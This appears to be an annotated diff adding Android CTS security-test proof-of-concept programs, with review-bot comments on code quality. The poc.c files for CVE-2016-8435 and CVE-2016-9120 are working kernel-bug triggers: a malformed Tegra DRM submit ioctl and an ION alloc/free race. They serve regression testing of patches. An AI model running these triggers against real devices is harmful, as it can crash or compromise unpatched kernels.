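Review bot: This header is not self-contained and carries definitions the test does not use. `__u32` and `__u64` appear without `#include <linux/types.h>`, so the header compiles only if an earlier include in poc.c happens to provide those types. The wireless-extension constants (`SIOCIWFIRSTPRIV` through `PRIV_CMD_WSC_PROBE_REQ`) and the `list_head`, `tegra_drm_client_ops`, `tegra_drm_client` and `tegra_drm_context` layout mirrors are not referenced by the poc.c added next to it and could be dropped. The guard `__local_pwn_H__` uses a reserved identifier; `LOCAL_PWN_H` avoids that.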
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+	int ret;
+	int dev_fd;
+	int i;
+
+	/* open dev */
+	dev_fd = open(DEV,O_RDONLY);
+	if(dev_fd == -1){
+		printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+		return 0;
+	}
+	
+	/* prepare for ioctl */
+	open_c.client = HOST1X_CLASS_VIC;
+	submit_c.num_syncpts = SYN_NUM;
+	submit_c.syncpts = (__u64)syncpts;
+
+	for(i = 1; i < SYN_NUM; i++){
+		syncpts[i].id = 192;
+		syncpts[i].incrs = 0xffff;
+	}
+
+	/* open channel */
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+	if(ret == -1){
+		printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+		goto out_dev;
+	}
+	submit_c.context = open_c.context;
+	printf("[+] call submit\n");
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	printf("[+] submit return %d\n", ret);
+	
+out_dev:
+	close(dev_fd);
+	return 0;
+}
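Review bot: `submit_c.syncpts = (__u64)syncpts;` casts a pointer directly to a 64-bit integer, which is a size-mismatched cast in the 32-bit variant this module also builds (`LOCAL_MULTILIB := both` in its Android.mk). Write it as `submit_c.syncpts = (__u64)(uintptr_t)syncpts;` and include `<stdint.h>`. `main` also returns 0 on every path, including when `open` or the open-channel ioctl fails, so the caller cannot tell "device node absent" from "submit was issued". If the host-side test does not depend on the exit status, a distinct non-zero return for the setup failures would make results easier to interpret.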
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+	ION_HEAP_TYPE_SYSTEM,
+	ION_HEAP_TYPE_SYSTEM_CONTIG,
+	ION_HEAP_TYPE_CARVEOUT,
+	ION_HEAP_TYPE_CHUNK,
+	ION_HEAP_TYPE_DMA,
+	ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+				 are at the end of this enum */
+	ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK		(1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK	(1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK		(1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK		(1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS		sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+	size_t len;
+	size_t align;
+	unsigned int heap_id_mask;
+	unsigned int flags;
+	ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+	ion_user_handle_t handle;
+	int fd;
+};
+
+
+struct ion_handle_data {
+	ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+	unsigned int cmd;
+	unsigned long arg;
+};
+#define ION_IOC_MAGIC		'I'
+
+#define ION_IOC_ALLOC		_IOWR(ION_IOC_MAGIC, 0, \
+				      struct ion_allocation_data)
+
+#define ION_IOC_FREE		_IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1		/* mappings of this buffer should be
+					   cached, ion will do cache
+					   maintenance when the buffer is
+					   mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2	/* mappings of this buffer will created
+					   at mmap time, if this is set
+					   caches must be managed manually */
+                       
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+    char* dev_path = "/dev/ion";
+    g_fd = open(dev_path, O_RDONLY);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+void prepare_data() {
+    void* data = malloc(0x1000);
+    
+    g_allocation = (struct ion_allocation_data*)data;
+    
+    g_allocation->len = 0x1000;
+    g_allocation->align = 8;
+    g_allocation->heap_id_mask = 1 << 25;
+    g_allocation->flags = ION_FLAG_CACHED;
+    g_allocation->handle = -1;
+    
+    mprotect(data, 0x1000, PROT_READ);
+    printf("[*] mprotect, error = %d\n", errno);
+    
+    g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+    ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+    ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+    }
+}
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-19, 2);
+    while (1) {
+        pthread_mutex_lock(&mutex);
+        pthread_cond_wait(&cond, &mutex);
+        trigger_ion_free();
+        pthread_mutex_unlock(&mutex);  
+    }
+    
+}
+
+
+int main(int argc, char**argv) {
+    if (open_driver() < 0) {
+        return -1;
+    }
+    setup_privi_and_affinity(0, 1);
+    prepare_data();
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    sleep(1);
+    while (1) {
+        pthread_cond_signal(&cond);
+        usleep(100);
+        trigger_ion_alloc();
+        sleep(1);
+    }
+
+    return 0;
+}
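Review bot: `prepare_data` dereferences the result of `malloc(0x1000)` without a NULL check, and it prints `errno` after `mprotect` without looking at the return value, so the log line can show a stale error. Guard both: `if (!data) { perror("malloc"); exit(1); }` and `if (mprotect(data, 0x1000, PROT_READ) < 0) perror("mprotect");`. In `setup_privi_and_affinity` the body of `if (sched_setaffinity(...) < 0) { }` is empty, so a failed CPU pin is silently ignored; log it as the CVE-2016-8434 copy of this helper does. `race_thread` is declared `void *` but has no return after its loop, and like `main` it never exits, so the run has to be bounded by the caller.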
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index 979ff5d..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -40,8 +40,7 @@
      * @param device device for the command to be ran on
      * @return the console output from running the command
      */
-    public static String runCommandLine(String command, ITestDevice device) throws Exception
-    {
+    public static String runCommandLine(String command, ITestDevice device) throws Exception {
         return device.executeShellCommand(command);
     }
 
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
index 0e03c5d..75f6e1e 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -31,7 +31,9 @@
 import java.io.OutputStream;
 import java.util.Scanner;
 
+
 public class Poc16_12 extends SecurityTestCase {
+
     /**
      *  b/32225180
      */